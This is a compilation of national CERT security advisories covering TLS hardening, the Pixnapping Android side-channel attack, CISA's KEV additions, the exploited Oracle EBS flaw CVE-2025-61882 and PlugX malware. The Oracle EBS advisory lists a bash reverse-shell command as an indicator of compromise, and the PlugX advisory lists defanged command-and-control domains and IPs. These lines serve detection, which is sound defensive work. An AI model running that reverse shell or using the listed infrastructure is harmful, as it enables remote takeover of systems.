Advisory ID: ngCERT-2025-100008
SUMMARY
ngCERT has observed a growing dependence on SSL/TLS (Secure Sockets Layer/Transport Layer Security) protocols, which are essential for securing data transmission across digital networks, particularly the internet. While SSL, introduced in the 1990s, has been deprecated due to significant security flaws, TLS, currently at version 1.3, serves as the modern, robust standard. TLS secures communication by encrypting data, authenticating parties through digital certificates, and ensuring data integrity via a secure handshake process that negotiates cryptographic parameters and exchanges keys. Beyond its role in securing websites (HTTPS), TLS also protects email, VoIP, messaging applications, and VPNs. Proper implementation is critical to defending sensitive information such as login credentials, financial data, and personal records from threats like man-in-the-middle attacks, data interception, and protocol downgrades. ngCERT advises organisations to disable outdated protocols (SSL, TLS 1.0/1.1), enforce strong cipher suites, maintain up-to-date systems, and use valid, trusted digital certificates to reduce risk and ensure secure communications.
Damage: Critical
Probability: High
Platform(s): Web
DESCRIPTION
SSL/TLS (Secure Sockets Layer/Transport Layer Security) are cryptographic protocols fundamental to securing data transmission over digital networks by providing confidentiality, authentication, and data integrity. SSL, developed in the 1990s, was widely used but is now obsolete due to inherent vulnerabilities. It has been replaced by TLS, which is the current industry standard. TLS protects data by encrypting information transmitted between clients and servers, verifying identities using digital certificates issued by trusted Certificate Authorities (CAs), and ensuring that data is not modified during transit. The process begins with a TLS handshake in which both parties agree on supported cryptographic algorithms (cipher suites), exchange keys securely, and establish a session key for encrypted communication. TLS 1.3, the latest version, improves security by removing insecure algorithms, reducing handshake latency, and simplifying protocol operations. TLS underpins the security of a wide range of services including HTTPS websites, secure email (SMTP, IMAP, POP3), VPNs, VoIP, and messaging apps. As online services increasingly handle sensitive information, TLS plays a vital role in defending against cyber threats such as man-in-the-middle attacks, certificate spoofing, protocol downgrade attacks, and data interception. It is a cornerstone of modern digital security and privacy in today's interconnected world.
CONSEQUENCES
- Data Exposure: Unencrypted or improperly secured transmissions may allow attackers to intercept passwords, personal data, and financial details.
- Man-in-the-Middle (MitM) Attacks: Attackers can intercept or manipulate data by impersonating legitimate communication endpoints.
- Protocol Downgrade Attacks: Attackers may force connections to use outdated and vulnerable SSL/TLS versions.
- Certificate Issues: Use of expired, misissued, or untrusted certificates can cause service disruptions and trigger browser warnings.
- Loss of User Trust: Security incidents can damage brand reputation and reduce customer confidence in digital services.
- Regulatory Non-Compliance: Inadequate data protection may violate laws such as GDPR, HIPAA, or PCI-DSS, leading to penalties.
- Financial Loss: Breaches and compliance failures can result in legal costs, fines, and lost revenue.
- Compromised Integrity: Data may be altered in transit without detection, causing misinformation or injecting malicious payloads.
- Service Disruption: Exploited vulnerabilities in SSL/TLS implementations can result in denial-of-service or related attacks.
SOLUTION/MITIGATION
ngCERT recommends the following:
- Use Latest TLS Versions: Disable SSL, TLS 1.0, and TLS 1.1; enforce TLS 1.2 or TLS 1.3 for all encrypted communications.
- Implement Strong Cipher Suites: Use modern, secure encryption algorithms; avoid outdated or weak ciphers such as RC4, DES, or MD5.
- Obtain Certificates from Trusted CAs: Ensure all digital certificates are issued by reputable Certificate Authorities.
- Regularly Renew and Manage Certificates: Track certificate expiration dates and renew or revoke them as needed to avoid security lapses.
- Enable Certificate Validation: Ensure clients validate server certificates to detect spoofed or forged certificates.
- Use Certificate Pinning (Where Applicable): Bind clients to specific, trusted certificates to prevent impersonation attacks.
- Keep Software Up to Date: Regularly patch TLS libraries (e.g., OpenSSL), web servers, and dependent applications.
- Perform Regular Security Audits: Conduct vulnerability assessments and penetration tests focused on TLS configurations.
- Enforce HTTP Strict Transport Security (HSTS): Mandate HTTPS-only connections to prevent downgrade attacks and mixed-content issues.
HYPERLINK
- www.acunetix.com/blog/articles/tls-vulnerabilities-attacks-final-part/
- www.freecodecamp.org/news/attacks-on-ssl-tls-and-how-to-protect-your-system/
- certera.com/blog/common-ssl-tls-challenges-issues-attacks-to-exploits/
- akimbocore.com/article/hardening-ssl-tls-common-ssl-security-issues-vulnerabilities/
Advisory ID: ngCERT-2025-100006
SUMMARY
ngCERT warns of a new Pixnapping attack that allows malicious Android apps to covertly steal sensitive on-screen data, such as two-factor authentication (2FA) codes, messages, and emails, within seconds. These malicious apps initially gain access through phishing attempts and exploit Android APIs and a hardware side channel that affects nearly all modern Android devices, running versions 13-16. The attackers target banking, cryptocurrency, and social media accounts for data exfiltration, account takeover, financial and privacy losses. Organisations and individuals using Android devices for sensitive communications or SMS-based two-factor authentication (2FA) are at a high risk. Immediate actions, including app updates and vetting, permission restrictions, and adoption of non-SMS 2FA, are critical to mitigate these threats.
Damage: Critical
Probability: High
Platform(s): Android Mobile Devices (Google Pixel and Samsung Galaxy S25), Applications Using SMS-Based 2FA, Messaging Apps
DESCRIPTION
Pixnapping is a sneaky cyberattack that lets hackers steal sensitive information, like two-factor authentication (2FA) codes and private messages, from Android phones by analysing what's displayed on the screen. Disguised as a legitimate app, a malicious app which gained initial access to target phones through phishing attempts, often tricks apps like Google Authenticator or messaging apps into showing data. Afterwards, the malware uses special techniques to "read" the screen pixel by pixel without any permissions, making it hard to spot. By measuring how long it takes to render certain parts of the screen, the app figures out what’s being shown, such as text or numbers and can harvest data, such as 2FA codes, in seconds on devices. This attack, which spreads through fake apps downloaded from untrustworthy sources, poses a serious threat as it bypasses normal security. Although a side channel information disclosure vulnerability in Android, CVE-2025-48561, exploited in the attack has been partially fixed, a complete patch is expected in December 2025.
INDICATOR OF COMPROMISE
The following are observed Indicators of Compromise (IoCs):
1. CVE Exploitation: Presence of CVE-2025-48561 vulnerabilities on unpatched Android 13-16 devices.
2. Suspicious Apps: Apps with no declared permissions but exhibiting overlay or blur behaviours.
3. Behavioural Anomalies: Unusual rendering delays, semi-transparent overlays, or repeated app invocations.
4. Network/Activity Patterns: Anomalous Intent usage or VSync timing measurements in app processes.
5. App Enumeration: Unauthorised detection of installed apps like Authenticator or messaging tools.
6. Device-Specific Signs: Performance issues on Pixel/Samsung devices during sensitive app usage.
CONSEQUENCES
Successful Pixnapping exploitation can result in:
- Sensitive Data Theft: Extraction of 2FA codes, private messages, emails, and location data, leading to account takeovers.
- Financial and Privacy Losses: Unauthorised access to banking or payment apps (e.g., Venmo), enabling fraud or blackmail.
- User Profiling: Detection of installed apps without permissions, aiding targeted attacks or surveillance.
- Delayed Detection: Stealthy operation hides from users; partial patches can be bypassed, prolonging exposure until full fixes.
- Broader Impacts: Compromises corporate or personal security, with recovery times averaging 14-25 seconds for 2FA theft on Pixels.
SOLUTION/MITIGATION
ngCERT recommends the following to defend against Pixnapping:
- Patch Management: Apply Android security updates immediately; install the September 2025 patch for partial mitigation and await the complete fix in December.
- App Installation Practices: Download apps only from Google Play; avoid side-loading or third-party sources.
- 2FA Enhancements: Switch to app-based or hardware 2FA (e.g., Authy, YubiKey) over SMS or visible codes.
- Device Hardening: Enable Google Play Protect, restrict app permissions, and use an antivirus with behavioural analysis.
- Monitoring: Review app logs for unusual Intent invocations or overlays; employ mobile threat detection tools.
- Developer Guidance: Limit visible sensitive data; no app-level fixes available yet; monitor Google advisories.
- Awareness: Educate users on phishing risks leading to malicious app installs.
HYPERLINK
Advisory ID: NCC-CSIRT-2025-020
Summary:
CISA has added five newly exploited vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalogue, confirming real-world attacks against major software products, including Oracle EBS and Microsoft Windows. The new entries include:
- A server-side request forgery (SSRF) issue (CVE-2025-61884) in Oracle EBS that can be triggered without authentication.
- A prior Oracle EBS remote code execution vulnerability (CVE-2025-61882) is already being exploited.
- A Microsoft Windows SMB Client privilege escalation flaw (CVE-2025-33073).
- Authentication bypass vulnerabilities in Kentico Xperience CMS (CVE-2025-2746 & CVE-2025-2747) enabling administrative control.
- An Apple JavaScriptCore arbitrary code execution flaw (CVE-2022-48503) affecting web content processing.
CISA has set a remediation deadline of November 10, 2025, for federal agencies.
Damage/Probability: Critical/High
Product(s):
- Oracle E‑Business Suite (EBS) – Runtime component/Configurator
- Microsoft Windows SMB Client
- Kentico Xperience CMS
- Apple JavaScriptCore
Version(s):
- Oracle EBS: vulnerabilities CVE-2025-61884 (SSRF) and CVE-2025-61882 (RCE)
- Microsoft Windows SMB Client: CVE-2025-33073 (improper access control)
- Kentico Xperience CMS: CVE-2025-2746 & CVE-2025-2747 (authentication bypass)
- Apple JavaScriptCore: CVE-2022-48503 (array-index validation)
Platform(s):
Enterprise ERP systems, Windows client environments, CMS web platforms, Apple/macOS devices using WebKit/JavaScriptCore.
Description:
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added five actively exploited vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalogue, confirming real-world attacks targeting major enterprise and consumer technologies from Oracle, Microsoft, Kentico, and Apple.
Two of the vulnerabilities affect Oracle E-Business Suite (EBS), a Server-Side Request Forgery (SSRF) flaw (CVE-2025-61884) and a Remote Code Execution (RCE) flaw (CVE-2025-61882). These issues reside in the Oracle Configurator runtime component and allow unauthenticated attackers to send crafted HTTP requests that can reach internal services, databases, or cloud resources. Exploitation of these vulnerabilities has been observed in the wild, with some threat actors using them for data exfiltration and lateral movement within enterprise networks.
The third flaw, CVE-2025-33073, impacts the Microsoft Windows SMB Client, where improper access control allows local attackers to escalate privileges. This vulnerability is particularly concerning in enterprise environments that use legacy SMB configurations or lack strict SMB signing and network segmentation, as attackers could exploit it to gain elevated rights and persistence.
Two additional vulnerabilities, CVE-2025-2746 and CVE-2025-2747, affect Kentico Xperience CMS. They stem from improper handling of authentication requests in the staging synchronization component, allowing unauthenticated users to bypass login controls and gain administrative access to web servers. Once exploited, attackers can modify website content, deploy web shells, or redirect users to malicious domains.
Lastly, CVE-2022-48503, a vulnerability in Apple’s JavaScriptCore (used in WebKit-based browsers), results from improper validation of array indices. This flaw allows attackers to execute arbitrary code on macOS and iOS devices when victims visit malicious or compromised websites. Although initially disclosed in 2022, it remains under active exploitation, highlighting how older vulnerabilities continue to be leveraged against unpatched systems.
CISA’s analysis confirms that these vulnerabilities are being actively exploited in the wild, and federal agencies have been mandated to patch affected systems by 10 November 2025. Organizations are strongly advised to prioritize remediation, implement network segmentation where patching cannot be done immediately, and monitor for signs of compromise, particularly unusual HTTP requests, unauthorized administrative access, or suspicious privilege escalation activities.
Impacts:
- Unauthorized access to enterprise resources via Oracle EBS SSRF or RCE leading to data exfiltration or lateral movement.
- Compromise of Windows clients via SMB Client privilege escalation, enabling attackers to gain elevated rights and persist.
- Administrative takeover of web content and infrastructure via Kentico CMS authentication bypass, enabling further malware deployment or defacement.
- Exploitation of macOS/iOS devices via Apple JavaScriptCore flaw, enabling arbitrary code execution through web content, risking endpoint compromise in enterprise “bring your own device” (BYOD) contexts.
- High risk for organizations that delayed or skipped patching, attackers often move quickly after CVEs are public and listed by CISA’s KEV.
Solutions:
- Prioritise Patching: Immediately apply vendor patches for the listed CVEs: Oracle EBS, Microsoft Windows (SMB Client), Kentico CMS, Apple devices.
- Confirm Asset Inventory: Ensure you know whether you run affected versions of Oracle EBS, Windows SMB Client endpoints, Kentico CMS installations, or macOS/iOS devices vulnerable to JavaScriptCore exploits.
- Isolate & Segment: Until patched, segregate vulnerable systems, especially Oracle EBS and CMS platforms, with stricter network segmentation and restricted access.
- Harden Configurations: For Windows SMB, enforce SMB signing, disable SMBv1/SMBv2 legacy, and monitor unusual local privilege escalations. For CMS, disable staging sync server access if unused and review user authentication flows.
- Monitor Logs & Network: Look for abnormal HTTP requests from Oracle servers to internal services (SSRF), sudden administrative logins in CMS, privilege escalation events in Windows, or unusual web content processing on Apple devices.
- Validate Remediation: After patching, run vulnerability scans and penetration tests focusing on these CVEs; verify no persistence or backdoor remains.
References:
Advisory ID: ngCERT-2025-100005
SUMMARY
ngCERT has detected a critical and easily exploitable vulnerability affecting the Oracle E-Business Suite (EBS) in Nigeria. This vulnerability, assigned
CVE-2025-61882 could be exploited remotely by an unauthenticated attacker with network access via HTTP to achieve remote code execution (RCE), potentially leading to full system takeover. Assigned a CVSS 3.1 with a base score of 9.8 (Critical), the flaw has been actively exploited in the wild by the Cl0p ransomware group; hence, it has been listed in CISA's Known Exploited Vulnerabilities (KEV) Catalogue. There is therefore an urgent need for organisations to update applications and apply patches to safeguard against exploits and possible cyberattacks.
Damage: Critical (CVSS 3.1 Base Score 9.8)
Probability: High
Platform(s): Oracle e-Business Suite
DESCRIPTION
CVE-2025-61882 is a critical vulnerability in the BI Publisher Integration component of Oracle Concurrent Processing within Oracle EBS
versions 12.2.3 through 12.2.14. It arises from a chain of exploitable weaknesses, including inconsistent HTTP request parsing, path traversal, improper neutralisation of CRLF sequences, XML external entity (XXE) reference issues, XML injection, and server-side request forgery (SSRF). An unauthenticated attacker with HTTP network access crafts malicious HTTP requests to exploit these flaws. The attack begins by leveraging inconsistent request parsing and path traversal to access restricted server resources. By injecting crafted XML payloads, the attacker exploits XXE and XML injection vulnerabilities to manipulate server-side processing. CRLF injection escalates the attack by injecting malicious headers, enabling SSRF to trigger unauthorized server requests. This chain culminates in RCE, allowing the attacker to execute arbitrary commands on the server without authentication.
CONSEQUENCES
Successful exploitation of these flaws could result in:
- Full System Compromise: Unauthenticated attackers can achieve remote code execution (RCE), gaining complete control over the Oracle E-Business Suite (EBS) instance.
- Data Exfiltration: Sensitive business data, including financial and customer information, can be stolen, leading to severe privacy and intellectual property breaches.
- Ransomware Deployment: Exploitation by groups like Cl0p enables ransomware attacks, causing data encryption and operational paralysis.
- Confidentiality and Integrity Loss: Full exposure and modification of sensitive data, undermining system trustworthiness and business operations.
- Service Disruption: Denial of service can halt critical EBS functions, leading to significant operational downtime.
SOLUTION/MITIGATION
To mitigate these vulnerabilities, ngCERT recommends the following measures:
- Apply Security Patches: Immediately install patches for Oracle E-Business Suite versions 12.2.3–12.2.14 as specified in Oracle’s patch availability document (Note 3106344.1 on My Oracle Support). Ensure the October 2023 Critical Patch Update (CPU) is applied as a prerequisite.
- Restrict Network Access: Limit HTTP access to the BI Publisher Integration component to trusted IP ranges using firewall rules or web application firewalls (WAF) to block malicious requests.
- Monitor and Detect: Actively monitor logs for indicators of compromise (IOCs), such as IP addresses (e.g., 200.107.207.26, 185.181.60.11), commands (e.g., sh -c /bin/bash -i >& /dev/tcp/ / 0>&1), or file hashes (e.g., SHA-256: 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d).
- Upgrade EBS Versions: Migrate to supported EBS versions under Premier or Extended Support to ensure patch availability and enhanced security.
- Disable Unnecessary Features: Deactivate non-essential Concurrent Processing features to reduce the attack surface.
- Interim Isolation: If patching is delayed, isolate the EBS environment from untrusted networks and enhance logging to detect exploitation attempts.
HYPERLINK
- https://www.oracle.com/security-alerts/alert-cve-2025-61882.html
- https://nvd.nist.gov/vuln/detail/CVE-2025-61882
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog
- https://www.crowdstrike.com/en-us/blog/crowdstrike-identifies-campaign-targeting-oracle-e-business-suite-zero-day-CVE-2025-61882/
- https://www.hipaajournal.com/cl0p-mass-exploiting-zero-day-vulnerability-oracle-e-business-suite/
- https://www.ncsc.gov.uk/news/active-exploitation-vulnerability-affecting-oracle-ebusiness-suite
Advisory ID: ngCERT-2025-100004
SUMMARY
ngCERT’s attention has been drawn to the resurgence of SOGU, aka PlugX malware infiltration, which poses a significant threat to Nigeria’s cyberspace. The malware is a sophisticated modular Remote Access Trojan (RAT) deployed by Advanced Persistent Threat (APT) actors in cyber-espionage campaigns. These attacks target critical infrastructure across multiple sectors, including telecommunication companies, as observed in current reports. SOGU is also identified as a backdoor with keylogging, surveillance, data exfiltration and stealth capabilities, while disguising itself as legitimate applications to avoid detection. New variants are equally capable of remote code execution, ensuring persistence through Dynamic Link Libraries (DLL) side-loading while implementing new C2 command identifiers. The compromise of critical infrastructure by this malware could result in privacy and data breaches, supply chain risks, financial losses, as well as reputational damage and possibly geopolitical implications. This underscores the need for public and private sector organisations to emplace robust defences to safeguard and mitigate the threats posed by PlugX.
Damage: Critical
Probability: High
Platform(s): Operating System, Networks and IoTs
DESCRIPTION
The recent PlugX attacks have targeted critical infrastructure, particularly telecommunications networks, by leveraging DLL side-loading for espionage purposes. In the initial access stage, attackers exploit legitimate executables, such as those from Quick Heal's Mobile Popup Application, to initiate DLL search order hijacking or side-loading of a malicious DLL. Notably, new variants also gain initial access by exploiting vulnerabilities in edge devices, such as firewalls and VPNs, and possibly weaknesses in IoTs. To deploy and execute the payload, the malicious DLL decrypts and loads PlugX (alongside variants like RainyDay or Turian) directly into memory using. This is achieved by utilizing Rivest Cypher 4 (a symmetric stream cypher) encryption and shared algorithms to evade disk-based detection. Likewise, the malware employs techniques like control flow flattening, API hashing, and embedded keyloggers to obscure its operations and resist reverse engineering. To ensure persistence and command execution, PlugX establishes long-term access, enabling arbitrary command execution, file uploads/downloads, and keylogging for credential theft and lateral movement within the network. Furthermore, compromised systems facilitate the theft of sensitive data, such as communications metadata, supporting broader cyber-espionage goals against critical sectors.
INDICATORS OF COMPROMISE
The following are observed Indicators of Compromise IoCs:
1. Domains
a) [.]relivonline[.]com
b) [.]im0[.]site
c) [.]frillsforspills[.]com
d) [.]365safemail[.]com
2. IPs with Ports
a) 103[.]79[.]120[.]85:443
b) 103[.]79[.]120[.]92:443
c) 103[.]79[.]120[.]71:443
d) 103[.]79[.]120[.]71:5000
e) 103[.]107[.]104[.]61:443
f) 103[.]107[.]104[.]61:5000
g) 39[.]105[.]24[.]38:3478
h) 39[.]105[.]24[.]38:443
i) 121[.]201[.]74[.]246:5000
j) 69[.]172[.]75[.]148:5000
k) 154[.]90[.]47[.]123:443
l) 154[.]90[.]47[.]123:5000
m) 45[.]128[.]153[.]73:443
CONSEQUENCES
SOGU aka PlugX malware attacks could result in:
- Extensive data exfiltration and espionage.
- Compromise of networks in critical sectors like telecom that can act as vectors for supply chain attacks.
- Economic and financial losses.
- Breaches that could further result in reputational damage, customer trust erosion, regulatory fines, and legal scrutiny.
- Operational disruptions and Denial of Service (DoS) attacks.
SOLUTION/MITIGATION
ngCERT recommends that organisations:
- Conduct regular security awareness training to help users recognize phishing attempts.
- Implement advanced email filtering solutions to block malicious emails before reaching end-users.
- Deploy and maintain up-to-date antivirus solutions capable of detecting PlugX signatures and behaviors.
- Enforce 2FA to protect access to sensitive systems and applications.
- Conduct regular analysis of system and network logs to identify anomalies related to PlugX behavior.
- Ensure the prompt application of patches and updates to all software to minimize exploitation
- opportunities.
- Filter network traffic by preventing unknown or untrusted access to remote services on internal systems.
- Ensure the review of domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.
HYPERLINK
- https://cybersecsentinel.com/the-return-of-plugx-malware-with-fresh-tricks/
- https://thehackernews.com/2025/09/china-linked-plugx-and-bookworm-malware.html
- https://security.googlecloudcommunity.com/community-blog-42/finding-malware-detecting-sogu-with-google-security-operations-3869
- https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx
- ngCERT SECURITY ADVISORY ON LOCKGOGA MEGACORTEX AND NEFILIM HYBRID RANSOWARE VARIANTS
- ngCERT SECURITY ADVISORY ON MULTIPLE MEDIUM – LOW VULNERABILITIES IN MICROSOFT WINDOWS COMPONENTS AND DELL FIRMWARE
- ngCERT SECURITY ADVISORY ON MULTIPLE CRITICAL AND HIGH VULNERABILITIES IN MICROSOFT WINDOWS COMPONENTS
- SIM-Farm Network Powering 49M Fake Accounts